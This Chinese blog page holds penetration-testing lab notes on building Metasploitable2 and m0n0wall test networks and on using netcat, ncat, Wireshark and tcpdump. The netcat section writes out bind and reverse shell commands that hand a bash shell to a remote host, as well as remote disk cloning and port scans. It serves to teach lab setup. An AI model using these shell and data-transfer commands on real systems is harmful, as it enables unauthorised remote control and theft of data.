清风冷吟
清风冷吟

渗透测试-环境(1)

  • 渗透测试-环境(1)
    • 代理
    • 实验环境
      • linux虚拟机(ether pad)
      • 测试用虚拟机系统Ubuntu:
      • Metasploitable2
    • 模拟真实网络
      • M0n0wall防火墙
      • 背靠背防火墙
    • 基本工具使用
      • NC/ncat
      • Wireshark
      • Tcpdump
      • 过程文档记录
        • Dradis
        • keepnote
        • truecrypt

渗透测试-环境(1)

代理

  • TOR
  • GoAgent Gtk

实验环境

linux虚拟机(ether pad)

http://www.turnkeylinux.org

测试用虚拟机系统Ubuntu:

下载Ubuntu Server的ISO文件

LAMP安装:(Linux,Apache,Mysql,Python/PHP)

· 网络选桥接

· 安装ssh

· 用Putty连接IP,安装lamp

Metasploitable2

https://www.metasploit.com/

  • 问题:/var/www/mutillidae/config.inc
    • $dbname=’owasp10’
  • 教程:https://www.fujieace.com/metasploit/tutorials.html

模拟真实网络

M0n0wall防火墙

http://m0n0.ch/wall/downloads.php

metasploit资源占用的非常的少

m0n0安装命令

m0n0wall console setup

  1. Interfaces: assign network ports //接口:分配网络端口

  2. Set up LAN IP address //建立局域网IP地址

  3. Reset web GUI password //web GUI重置密码

  4. Rest to factory defaults //其他工厂默认值

  5. Reboot system //重新启动系统

  6. Ping host //Ping主机

  7. Install on Hard Drive //安装在硬盘上

Enter a number: 7

do you want to proceed? (y/n) y

取消硬盘m0n0wall_1.8.1.iso

重启

m0n0wall console setup

  1. Interfaces: assign network ports //接口:分配网络端口

  2. Set up LAN IP address //建立局域网IP地址

  3. Reset web GUI password //web GUI重置密码

  4. Rest to factory defaults //其他工厂默认值

  5. Reboot system //重新启动系统

  6. Ping host //Ping主机

  7. Install on Hard Drive //安装在硬盘上

Enter a number: 1

do you want to set up VLANs nows? (y/n)

Enter the parent interface name for the new VLAN (or nothing if finished):em0

Enter the VLAN tag (1-4091): 10

Enter the parent interface name for the new VLAN (or nothing if finished):em1

Enter the VLAN tag (1-4091): 11

Enter the parent interface name for the new VLAN (or nothing if finished):em2

Enter the VLAN tag (1-4091): 12

回车

Enter the LAN interface name or ‘a’ for auto-detection: em1

Enter the WAN interface name or ‘a’ for auto-detection: em0

Enter the Optional 1 interface name or ‘a’ for auto-detection for nothing if finshed): em2

回车

The interface will be assigned as follows:

LAN -> em1

WAN -> em0

OPT1 -> em2

The firewall will reboot after saving the changes.

do you want to proceed? (y/n) y

The firewall is rebooting now.

重启

m0n0wall console setup

  1. Interfaces: assign network ports //接口:分配网络端口

  2. Set up LAN IP address //建立局域网IP地址

  3. Reset web GUI password //web GUI重置密码

  4. Rest to factory defaults //其他工厂默认值

  5. Reboot system //重新启动系统

  6. Ping host //Ping主机

  7. Install on Hard Drive //安装在硬盘上

Enter a number: 2

Enter the new LAN IP address: 10.1.1.10

Subnet masks are entered as bit counts (as in CIDR notation) in m0n0wall.

e.g. 255.255.255.0= 24

255.255.0.0 = 16

255.0.0.0 = 8

Enter the new LAN subnet bit count: 24

DO you want to enable the DHCP server on LAN (y/n) y

Enter the start address of the clinet address range: 10.1.1.20

Enter the end address of the client address range: 10.1.1.100

m0n0wall console setup

  1. Interfaces: assign network ports //接口:分配网络端口

  2. Set up LAN IP address //建立局域网IP地址

  3. Reset web GUI password //web GUI重置密码

  4. Rest to factory defaults //其他工厂默认值

  5. Reboot system //重新启动系统

  6. Ping host //Ping主机

  7. Install on Hard Drive //安装在硬盘上

Enter a number: 3

do you wnat to proceed? (y/n) y

Description OPT1

IP address 10.1.2.10/24

设置防火墙规则

pules------> “+”------>

Protocol: any

Source: LAN subnet

保存

WAN------>勾选"Block private networks"

背靠背防火墙

  • Pfsense: http://pfsense.org/

基本工具使用

NC/ncat

  • 网络工具中的瑞士军刀-小身材、大智慧
  • 侦听模式/传输模式
  • telnet/获取banner信息
    • nc -nv 1.1.1.1 110 邮件服务器
    • nc -nv 1.1.1.1 25 邮件服务器
    • nc -nv 1.1.1.1 80 web服务器
  • 传输文本信息
    • A: nc -l -p 4444 服务端:开端口
    • B: nc -nv 1.1.1.1 4444 客户端:连接服务器
    • 远程电子取证信息收集
    • 消息传输
    • 远程终端
  • 传输文件/目录
    • 传输文件1
      • A: nc -l -p 333 > ps.txt 服务端:接受信息
      • B: ps aux | nc -nv 1.1.1.1 333 -q 1 客户端:发送信息
      • B: nc -nv 1.1.1.1 333 < ps.txt -q 1 客户端:发送文件
    • 传输文件2
      • A: nc -q 1 -lp 333 < ps.txt 服务端:发送文件
      • B: nc -nv 1.1.1.1 333 > ps.txt 客户端:接受文件
    • 传输目录
      • A: tar -cvf - music/ | nc -lp 333 -q 1 服务端:发送目录
      • B: nc -nv 1.1.1.1 333 | tar -xvf - 客户端:接受目录
  • 加密传输文件
    • A: nc -l -p 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > ps.txt 服务端:接受文件
    • B: mcrypt --flush -Fbd -a rijndael-256 -m ecb < ps.txt | nc -nv 1.1.1.1 333 -q 1 客户端:发送文件
  • 远程控制/木马
    • 远程控制1
      • A: nc -l -p 4444 服务端:开端口
      • B: nc -nv 1.1.1.1 4444 客户端:连接服务器
    • 远程控制-正向
      • A: nc -lp 333 -c bash
      • B: nc 1.1.1.1 333
    • 远程控制-反向
      • A: nc -lp 333
      • B: nc 1.1.1.1 333 -c bash
    • 注意:windows用户把bash改为cmd;
  • 加密所有流量
  • 流媒体服务器
    • A: cat 1.mp4 | nc -lp 333 服务端:发送
    • B: nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 - 客户端:接收
  • 远程克隆硬盘
    • A: nc -lp 333 | dd of=/dev/sda 服务端:目标盘
    • B: dd if=/dev/sdb | nc -nv 1.1.1.1 333 -q 1 客户端:接收盘
    • 远程电子取证,可以将目标服务器硬盘远程复制,或内存。
  • 端口扫描
    • nc -nvz 1.1.1.1 1-65535
    • nc -nvzu 1.1.1.1 1-1024
  • NCAT
    • NC缺乏加密和身份验证的能力
    • Nca包含于nmap工具包中
    • A: ncat -c bash --allow 1.1.1.1 -vnl 333 --ssl
    • B: ncat -vn 1.1.1.1 333 --ssl
  • 不同系统/平台nc参数功能不尽相同

Wireshark

  • 抓包嗅探协议分析
  • 安全专家必备技能
  • 抓包引擎
    • libpcap9 — linux
    • winpcap10 — Windows
  • 解码能力
  • 常见协议包
    • 数据包的分层结构
    • arp
    • lcmp
    • tcp – 三次握手
      • 数据流
        • http
        • smtp
        • pop3
        • ssl
    • udp
    • dns
    • http
    • https
    • ftp
  • 信息统计
    • 节点数
    • 协议分布
    • 包大小分布
    • 会话连接
    • 解码方式
    • 专家系统
  • 实践
    • 抓包对比nc、ncat加密与不加密的流量
    • 企业抓包部署方案
      • sniffer
      • cace/riverbed

Tcpdump

  • no-gui的抓包分析工具
  • linux、unix系统默认安装
  • 抓包
    • 默认只抓68个字节
    • tcpdump -i eth0 -s 0 -w file.pcap
    • tcpdump -i eth0 port 22
  • 读取抓包文件
    • tcpdump -r file.pcap
  • 筛选
    • tcpdump -n -r http.cap | awk {print $3} | sort -u
    • tcpdump -n src host 1.1.1.1 -r http.cap
    • tcpdump -n dst host 1.1.1.1 -r http.cap
    • tcpdump -n port 53 -r http.cap
    • tcpdump -nX port 80 -r http.cap
  • 高级筛选
    • tcpdump -A -n ‘tcp[13] = 24’ -r http.cap

过程文档记录

Dradis

  • 短期临时小团队资源共享
  • 各种插件导入文件

keepnote

truecrypt

  • 加密工具
  • 过时

你可能感兴趣的:(渗透测试,渗透测试)

  • 基础渗透测试实验—永恒之蓝漏洞复现 锅盖'awa' 网络安全小白之路linuxwindows系统安全安全性测试
    文章目录概述一、漏洞简述二、组件概述三、漏洞影响四、漏洞复现4.1环境搭建4.2复现过程:1.查看上线主机2.使用Metasploit(MSF)工具3.选择一个编码技术,用来绕过杀毒软件的查杀4.远程控制目标机缓解措施概述永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏
  • 全面信息收集指南:渗透测试中的关键步骤与技巧 Clockwiseee 信息收集安全web安全渗透测试漏洞挖掘
    文章目录一、什么是信息收集二、信息收集的分类1.服务器相关信息2.网站指纹识别3.Whois及目标背景信息4.子域名及关联资产5.GoogleHacking(搜索引擎利用)6.网站目录和敏感文件7.传输协议与漏洞利用8.第三方依赖与拓展信息三、信息收集的方式1.whois在线查询使用技巧2.在线网站备案查询3.收集子域名3.1网络空间绘测绘测的目的和意义3.2子域名爆破工具四、端口五、查找真实IP
  • 第30篇:Python开发进阶:网络安全与测试 猿享天开 python从入门到精通pythonweb安全开发语言
    第30篇:网络安全与测试目录网络安全概述什么是网络安全常见的安全威胁Python中的网络安全工具常用安全库介绍安全编码实践密码学基础加密与解密哈希函数数字签名安全认证与授权用户认证访问控制OAuth与JWTWeb应用安全常见的Web安全漏洞防护措施安全测试网络安全测试渗透测试自动化测试工具安全漏洞扫描使用Python进行安全测试使用Scapy进行网络嗅探使用Requests进行安全测试使用Beau
  • 网络安全(黑客)——自学2025 网安大师兄 web安全安全网络网络安全linux
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习
  • 面试经验分享 | 杭州某安全大厂渗透测试岗二面 黑客老李 面试经验分享安全服务器大数据数据库职场和发展
    更多大厂面试经验的视频分享看主页目录:所面试的公司:某安全大厂所在城市:杭州面试职位:渗透测试工程师面试过程:面试官的问题:1、问了我最近在做什么,学什么方向的东西?2、问了我简历上面写着有过培训经历,问我有过哪方面的培训?3、问对Windows和linux系统了解多少?4、windows和linux查看计划任务⽤那些命令?5、Linux后台有⼀个进程,你需要找到他的程序执⾏⽂件,该怎么找?6、在
  • 面试经验分享 | 杭州某安全大厂渗透测试岗 黑客老李 面试经验分享安全服务器运维职场和发展python
    更多大厂面试经验的视频经验分享看主页目录:所面试的公司:某安全大厂所在城市:杭州面试职位:渗透测试工程师面试过程:面试官的问题:1、面试官开始就问了我,为什么要学网络安全?2、什么是sql注⼊3、关于sql注⼊,都分为那些?4、如果在实战中遇到了防护,⽐如sql注⼊过滤掉了空格怎么办?5、什么是csrf?6、简单讲解下内存⻢?7、讲下内存⻢排查思路?8、平常有对APP、小程序渗透测试吗?9、你是用
  • 渗透测试之 通俗易懂让你搞明白如何做渗透测试【渗透测试之流程(步骤)】 什么是白帽子? 什么是黑帽子?什么又是黑客 这篇文章让你搞明白 浩浩测试一下 web渗透测试方式方法网络安全python自动化
    目录写在前面的内容:从黑客到黑客的步骤什么是黑客:黑客之步骤:首先:从上面总结性图片我们可以看出黑客得攻击步骤无非就是总结下来分为4个步骤!明确目标信息收集漏洞探测漏洞验证高危漏洞利用总结一下子:写在前面的内容:其实很多小伙伴,都听过黑客这个词汇也对黑客这个职业或者说这个工种很好奇,那么黑客到底是干什么的,是如何进行黑客的一个工作流程的了?这篇文章,我将以大白话+专业术语的方式让大家明白,什么是黑
  • 渗透测试 - webshell jsp一句话大马 && 蚁剑连接 浩浩测试一下 OWASPTop漏洞web渗透java开发语言网络安全安全系统安全web安全
    目录大木马webshell大马连接大木马<%@pageimport="javax.imageio.*"%&g
  • 2025年三个月自学手册 网络安全(黑客技术) 网安kk web安全安全网络网络安全人工智能
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习导航
  • 2024年自学手册 网络安全(黑客技术) 网安kk 网络安全web安全网络安全学习
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习
  • Windows 靶机常见服务、端口及枚举工具与方法全解析:SMB、LDAP、NFS、RDP、WinRM、DNS vortex5 windows网络安全渗透测试
    在渗透测试中,Windows靶机通常会运行多种服务,每种服务都有其默认端口和常见的枚举工具及方法。以下是Windows靶机常见的服务、端口、枚举工具和方法的详细说明:1.SMB(ServerMessageBlock)端口445/TCP:SMBoverTCP(主要端口)。139/TCP:NetBIOSSessionService(旧版SMB)。常见用途文件共享。打印机共享。远程命令执行。枚举工具与方
  • 202年寒假充电计划——自学手册 网络安全(黑客技术) 网安康sir web安全安全网络php开发语言
    前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习导航三大章节,涉及价值观、方法论、执行力、行业分类、职位解读、法
  • 25-5 SQL 注入攻击 - insert注入 技术探索 Web安全攻防全解析sql数据库
    环境准备:构建完善的安全渗透测试环境:推荐工具、资源和下载链接_渗透测试靶机下载-CSDN博客一、注入原理描述:insert注入是指通过前端注册的信息被后台通过insert操作插入到数据库中。如果后台没有做相应的处理,就可能导致insert注入漏洞。原因:后台未对用户输入进行充分验证和过滤,导致恶意用户可以利用特定的输入构造恶意代码,从而影响数据库的插入操作,或者获取敏感数据。二、注入方法注入手段
  • Metasploit Pro 4.22.5-2024102801 发布下载,新增功能简介 metasploit
    MetasploitPro4.22.5-2024102801(Linux,Windows)-专业渗透测试框架2024年10月28日,版本4.22.5-2024102801请访问原文链接:MetasploitPro4.22.5-2024102801(Linux,Windows)-专业渗透测试框架查看最新版。原创作品,转载请保留出处。作者主页:sysin.org世界上最广泛使用的渗透测试框架知识就是力
  • 【超详细】深入解析Kali Linux:常见指令大全,助你成为安全专家 wit_@ chrome前端linuxkail网络安全
    深入解析KaliLinux:常见指令大全,助你成为安全专家KaliLinux是网络安全领域最受欢迎的操作系统之一,专为渗透测试、数字取证和网络安全研究而设计。无论你是网络安全新手,还是经验丰富的安全专家,掌握KaliLinux的常见指令都是必不可少的。本文将详细介绍KaliLinux中的一些常见指令,帮助你更好地利用这个强大的工具。1.基本系统指令1.1apt-get包管理KaliLinux基于D
  • Pocsuite3渗透测试框架编写POC和EXP脚本 wespten 全栈网络安全渗透测试代码审计网络安全工具开发大数据
    在我们的日常渗透测试中,经常挖掘到一些漏洞,但是我们一般使用挖掘工具或者手工判断的时候,不好确定是不是真的存在这么一个漏洞,因此POC脚本就应运而生了。POC全称是ProofofConcept,中文译作概念验证。它是专门为了验证漏洞是否真的存在的脚本。而EXP全称是Exploit,中文译作漏洞利用程序。它是对POC验证结果的一种漏洞利用脚本。因为市面上有关POC和EXP脚本的教程比较稀少,但是比较
  • 【2024最新】渗透测试工具大全(超详细),收藏这一篇就够了! 渗透谢老丝 linuxweb安全网络安全密码学系统安全
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包所有工具仅能在取得足够合法授权的企业安全建设中使用,在使用所有工具过程中,您应确保自己所有行为符合当地的法律法规。如您在使用所有工具的过程中存在任何非法行为,您将自行承担所有后果,所有工具所有开发者和所有贡献者不承担任何法律及连带责任。除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用以下所有工具。您的使用行为或
  • 网络安全渗透测试的八个步骤 披荆斩棘的GG 学习路线Web安全网络安全web安全网络安全
    一、明确目标1.确定范围:测试目标的范畴、ip、网站域名、内外网、检测帐户。2.确定标准:能渗入到何种程度,所花费的时间、能不能改动提交、能不能漏洞利用、这些。3.确定要求:web应用的漏洞、业务逻辑漏洞、工作人员管理权限管理漏洞、这些。二、信息收集1.方法:积极扫描仪,开放搜索等。2.开放搜索:使用百度搜索引擎得到:后台管理、未经授权网页页面、比较敏感url、这些。3.基础信息:IP、子网、网站
  • 面试经验分享 | 北京渗透测试岗位 黑客老陈 面试经验分享职场和发展安全web安全服务器运维
    更多大厂面试经验的视频经验分享看主页目录:所面试的公司:安全大厂所在城市:北京面试职位:渗透测试工程师面试方式:腾讯会议线上面试+线下面试面试过程:面试官的问题:1、说一下XSS有哪几种类型及区别?2、讲一下你所知道的端口号及其代表什么服务?3、在渗透测试中,拿到一个目标公司的站点,接下来你会怎么做,说下具体流程?4、说一下CSRF和SSRF的区别?5、说一下文件上传的绕过方式?6、mysql数据
  • PenSafe(水洞扫描工具) 不一样的信息安全 工具安全web安全网络安全
    免责声明本系列工具仅供安全专业人员进行已授权环境使用,此工具所提供的功能只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用工具中的功能对任何计算机系统进行入侵操作。利用此工具所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。工具地址:点击领取PenSafe(水洞扫描工具)简介渗透测试安全(PenetrationTesting+Safe):在
  • #渗透测试#网络安全# 一文搞懂什么是木马!!! 独行soc 一文了解网络安全安全网络面试木马病毒
    免责声明本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。目录一、什么是木马木马的定义木马的类型二、如何检测电脑是否感染木马?三、木马与病毒的区别是什么?四、常见的木马传播途径有哪些?五、木马病毒混合体案例分析案例1:CIH病毒与木马结合案例2:熊猫
  • 渗透测试之webshell 蚁剑 流量分析 特性分析 抓包分析 浩浩测试一下 网络安全安全系统安全web安全安全架构网络攻击模型
    目录蚁剑是什么特性简介:蚁剑流量特征两大特征流量分析分析UserAgent数据内容解码分析总结蚁剑是什么蚁剑(AntSword)是一款开源的跨平台WebShell管理工具特性简介:AntSword(蚁剑)是一款开源的网络安全工具,常用于网络渗透测试和攻击。它可以远程连接并控制被攻击计算机,执行命令、上传下载文件等操作。蚁剑与网站进行数据交互的过程中发送的数据是经过编码器编码后再发送支持的编码方式有
  • 渗透测试术语--必要基础 大象只为你 跟我学网安知识网络安全
    一、前言了解和记住渗透测试术语是网络安全技术人员必要的基础,能帮助我们有效沟通和合作、全面理解渗透测试流程、设计和规划渗透测试活动、安全漏洞识别和利用和规避法律和道德风险。我整理一部分术语,自己归为8个分类方便记忆。共整理了56个术语,每个术语都有简要的含义解释。二、渗透测试术语1、攻击介质1.1、漏洞硬件、软件、协议的缺陷,可以通过未授权的方式访问、破坏系统。1.2、木马获取用户权限的程序或者代
  • 渗透测试工具包 | 开源安全测试工具 | 网络安全工具_网络安全渗透测试工具 程序员安安 安全开源测试工具网络安全信息安全web安全android
    项目介绍记录渗透测试开源工具。自动化渗透测试AttackSurfaceMapper-自动化渗透测试工具,使用手册/测试流程。vajra-自动化渗透测试.Savior-渗透测试报告自动生成工具!.漏洞利用框架hackUtils-它是一个用于渗透测试和网络安全研究的黑客工具包,渗透以及web攻击脚本。msf框架:pocsscan攻击框架Pocsuite攻击框架Beebeeto攻击框架漏洞POC&EXP
  • 内网安全攻防:渗透测试实战指南之内网信息搜集 网络安全进阶 渗透测试网络安全渗透测试web安全信息安全
    《内网安全攻防:渗透测试实战指南》第2章:内网信息搜集内网渗透测试的核心是信息搜集。本章主要介绍了当前主机信息搜集、域内存活主机探测、域内端口扫描、域内用户和管理员权限的获取、如何获取域内网段划分信息和拓扑架构分析等,并介绍了域分析工具BloodHound的使用。搜集本机信息网络配置信息、操作系统及软件的信息、本机服务信息、进程列表、启动程序信息、计划任务、主机开机时间、用户列表、连接会话、端口列
  • 内网渗透测试工具及渗透测试安全审计方法总结 Hacker_Nightrain 测试工具安全网络
    1.内网安全检查/渗透介绍1.1攻击思路有2种思路:攻击外网服务器,获取外网服务器的权限,接着利用入侵成功的外网服务器作为跳板,攻击内网其他服务器,最后获得敏感数据,并将数据传递到攻击者,看情况安装长期后门,实现长期控制和获得敏感数据的方式;攻击办公网的系统、办公网电脑、办公网无线等方式,一般是采用社工,实现控制办公电脑,再用获得的办公网数据,可能是内网的各种登录账号和密码,再获取办公网或者生产网
  • 网络安全、Web安全、渗透测试之笔经面经总结 网络安全Ash web安全安全
    本篇文章涉及的知识点有如下几方面:1.什么是WebShell?2.什么是网络钓鱼?3.你获取网络安全知识途径有哪些?4.什么是CC攻击?5.Web服务器被入侵后,怎样进行排查?6.dll文件是什么意思,有什么用?DLL劫持原理7.0day漏洞8.Rootkit是什么意思9.蜜罐10.ssh11.DDOS12.震网病毒:13.一句话木马14.Https的作用15.手工查找后门木马的小技巧16.描述O
  • 【Death Note】网吧战神之7天爆肝渗透测试死亡笔记_sqlmap在默认情况下除了使用 char() 函数防止出现单引号 2401_84561374 程序员笔记
    网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!特殊服务端口2181zookeeper服务未授权访问
  • 渗透测试的了解 锅盖'awa' 网络安全小白之路安全性测试安全
    文章目录概述一、渗透测试分类1.黑盒测试/外部测试2.白盒测试/内部测试3.灰盒测试/组合测试二、渗透测试-目标分类1、主机操作系统渗透2、数据库系统渗透3、应用系统渗透4、网络设备渗透三、渗透测试过程(七个阶段)1.前期交互阶段(Pre-EngagementInteraction)2.情报搜集阶段(InformationGathering)3.威胁建模阶段(ThreatModeling)4.漏洞
  • 网络安全测评技术与标准 坚持可信 信息安全web安全网络安全
    网络安全测评是评估信息系统、网络和应用程序的安全性,以发现潜在的漏洞和威胁,并确保系统符合安全标准和政策的过程。以下是常见的网络安全测评类型:1.渗透测试(PenetrationTesting)描述:通过模拟真实的攻击,评估系统、网络和应用程序的安全性,识别和修复漏洞。目标:发现系统中的安全漏洞,评估其可能被利用的风险。方法:黑盒测试:测试人员没有系统内部信息,模拟外部攻击者。白盒测试:测试人员拥
  • iOS http封装 374016526 ios服务器交互http网络请求
    程序开发避免不了与服务器的交互,这里打包了一个自己写的http交互库。希望可以帮到大家。   内置一个basehttp,当我们创建自己的service可以继承实现。   KuroAppBaseHttp *baseHttp = [[KuroAppBaseHttp alloc] init]; [baseHttp setDelegate:self]; [baseHttp
  • lolcat :一个在 Linux 终端中输出彩虹特效的命令行工具 brotherlamp linuxlinux教程linux视频linux自学linux资料
      那些相信 Linux 命令行是单调无聊且没有任何乐趣的人们,你们错了,这里有一些有关 Linux 的文章,它们展示着 Linux 是如何的有趣和“淘气” 。 在本文中,我将讨论一个名为“lolcat”的小工具 – 它可以在终端中生成彩虹般的颜色。 何为 lolcat ? Lolcat 是一个针对 Linux,BSD 和 OSX 平台的工具,它类似于 cat 命令,并为 cat
  • MongoDB索引管理(1)——[九] eksliang mongodbMongoDB管理索引
    转载请出自出处:http://eksliang.iteye.com/blog/2178427 一、概述       数据库的索引与书籍的索引类似,有了索引就不需要翻转整本书。数据库的索引跟这个原理一样,首先在索引中找,在索引中找到条目以后,就可以直接跳转到目标文档的位置,从而使查询速度提高几个数据量级。       不使用索引的查询称
  • Informatica参数及变量 18289753290 Informatica参数变量
    下面是本人通俗的理解,如有不对之处,希望指正 info参数的设置:在info中用到的参数都在server的专门的配置文件中(最好以parma)结尾 下面的GLOBAl就是全局的,$开头的是系统级变量,$$开头的变量是自定义变量。如果是在session中或者mapping中用到的变量就是局部变量,那就把global换成对应的session或者mapping名字。 [GLOBAL] $Par
  • python 解析unicode字符串为utf8编码字符串 酷的飞上天空 unicode
    php返回的json字符串如果包含中文,则会被转换成\uxx格式的unicode编码字符串返回。 在浏览器中能正常识别这种编码,但是后台程序却不能识别,直接输出显示的是\uxx的字符,并未进行转码。   转换方式如下   >>> import json >>> q = '{"text":"\u4
  • Hibernate的总结 永夜-极光 Hibernate
    1.hibernate的作用,简化对数据库的编码,使开发人员不必再与复杂的sql语句打交道   做项目大部分都需要用JAVA来链接数据库,比如你要做一个会员注册的 页面,那么 获取到用户填写的 基本信后,你要把这些基本信息存入数据库对应的表中,不用hibernate还有mybatis之类的框架,都不用的话就得用JDBC,也就是JAVA自己的,用这个东西你要写很多的代码,比如保存注册信
  • SyntaxError: Non-UTF-8 code starting with '\xc4' 随便小屋 python
    刚开始看一下Python语言,传说听强大的,但我感觉还是没Java强吧! 写Hello World的时候就遇到一个问题,在Eclipse中写的,代码如下 ''' Created on 2014年10月27日 @author: Logic ''' print("Hello World!");  运行结果 SyntaxError: Non-UTF-8
  • 学会敬酒礼仪 不做酒席菜鸟 aijuans 菜鸟
    俗话说,酒是越喝越厚,但在酒桌上也有很多学问讲究,以下总结了一些酒桌上的你不得不注意的小细节。 细节一:领导相互喝完才轮到自己敬酒。敬酒一定要站起来,双手举杯。 细节二:可以多人敬一人,决不可一人敬多人,除非你是领导。 细节三:自己敬别人,如果不碰杯,自己喝多少可视乎情况而定,比如对方酒量,对方喝酒态度,切不可比对方喝得少,要知道是自己敬人。 细节四:自己敬别人,如果碰杯,一
  • 《创新者的基因》读书笔记 aoyouzi 读书笔记《创新者的基因》
    创新者的基因   创新者的“基因”,即最具创意的企业家具备的五种“发现技能”:联想,观察,实验,发问,建立人脉。   第一部分破坏性创新,从你开始 第一章破坏性创新者的基因 如何获得启示: 发现以下的因素起到了催化剂的作用:(1) -个挑战现状的问题;(2)对某项技术、某个公司或顾客的观察;(3) -次尝试新鲜事物的经验或实验;(4)与某人进行了一次交谈,为他点醒
  • 表单验证技术 百合不是茶 JavaScriptDOM对象String对象事件
    js最主要的功能就是验证表单,下面是我对表单验证的一些理解,贴出来与大家交流交流  ,数显我们要知道表单验证需要的技术点, String对象,事件,函数   一:String对象;通常是对字符串的操作;   1,String的属性;   字符串.length;表示该字符串的长度; var str= "java"
  • web.xml配置详解之context-param bijian1013 javaservletweb.xmlcontext-param
    一.格式定义: <context-param> <param-name>contextConfigLocation</param-name> <param-value>contextConfigLocationValue></param-value> </context-param> 作用:该元
  • Web系统常见编码漏洞(开发工程师知晓) Bill_chen sqlPHPWebfckeditor脚本
    1.头号大敌:SQL Injection 原因:程序中对用户输入检查不严格,用户可以提交一段数据库查询代码,根据程序返回的结果, 获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 本质: 对于输入检查不充分,导致SQL语句将用户提交的非法数据当作语句的一部分来执行。 示例: String query = "SELECT id FROM users
  • 【MongoDB学习笔记六】MongoDB修改器 bit1129 mongodb
    本文首先介绍下MongoDB的基本的增删改查操作,然后,详细介绍MongoDB提供的修改器,以完成各种各样的文档更新操作  MongoDB的主要操作 show dbs 显示当前用户能看到哪些数据库 use foobar 将数据库切换到foobar show collections 显示当前数据库有哪些集合 db.people.update,update不带参数,可
  • 提高职业素养,做好人生规划 白糖_ 人生
      培训讲师是成都著名的企业培训讲师,他在讲课中提出的一些观点很新颖,在此我收录了一些分享一下。注:讲师的观点不代表本人的观点,这些东西大家自己揣摩。   1、什么是职业规划:职业规划并不完全代表你到什么阶段要当什么官要拿多少钱,这些都只是梦想。职业规划是清楚的认识自己现在缺什么,这个阶段该学习什么,下个阶段缺什么,又应该怎么去规划学习,这样才算是规划。  
  • 国外的网站你都到哪边看? bozch 技术网站国外
    学习软件开发技术,如果没有什么英文基础,最好还是看国内的一些技术网站,例如:开源OSchina,csdn,iteye,51cto等等。 个人感觉如果英语基础能力不错的话,可以浏览国外的网站来进行软件技术基础的学习,例如java开发中常用的到的网站有apache.org 里面有apache的很多Projects,springframework.org是spring相关的项目网站,还有几个感觉不错的
  • 编程之美-光影切割问题 bylijinnan 编程之美
    package a; public class DisorderCount { /**《编程之美》“光影切割问题” * 主要是两个问题: * 1.数学公式(设定没有三条以上的直线交于同一点): * 两条直线最多一个交点,将平面分成了4个区域; * 三条直线最多三个交点,将平面分成了7个区域; * 可以推出:N条直线 M个交点,区域数为N+M+1。
  • 关于Web跨站执行脚本概念 chenbowen00 Web安全跨站执行脚本
    跨站脚本攻击(XSS)是web应用程序中最危险和最常见的安全漏洞之一。安全研究人员发现这个漏洞在最受欢迎的网站,包括谷歌、Facebook、亚马逊、PayPal,和许多其他网站。如果你看看bug赏金计划,大多数报告的问题属于 XSS。为了防止跨站脚本攻击,浏览器也有自己的过滤器,但安全研究人员总是想方设法绕过这些过滤器。这个漏洞是通常用于执行cookie窃取、恶意软件传播,会话劫持,恶意重定向。在
  • [开源项目与投资]投资开源项目之前需要统计该项目已有的用户数 comsci 开源项目
            现在国内和国外,特别是美国那边,突然出现很多开源项目,但是这些项目的用户有多少,有多少忠诚的粉丝,对于投资者来讲,完全是一个未知数,那么要投资开源项目,我们投资者必须准确无误的知道该项目的全部情况,包括项目发起人的情况,项目的维持时间..项目的技术水平,项目的参与者的势力,项目投入产出的效益.....
  • oracle alert log file(告警日志文件) daizj oracle告警日志文件alert log file
    The alert log is a chronological log of messages and errors, and includes the following items: All internal errors (ORA-00600), block corruption errors (ORA-01578), and deadlock errors (ORA-00060)
  • 关于 CAS SSO 文章声明 denger SSO
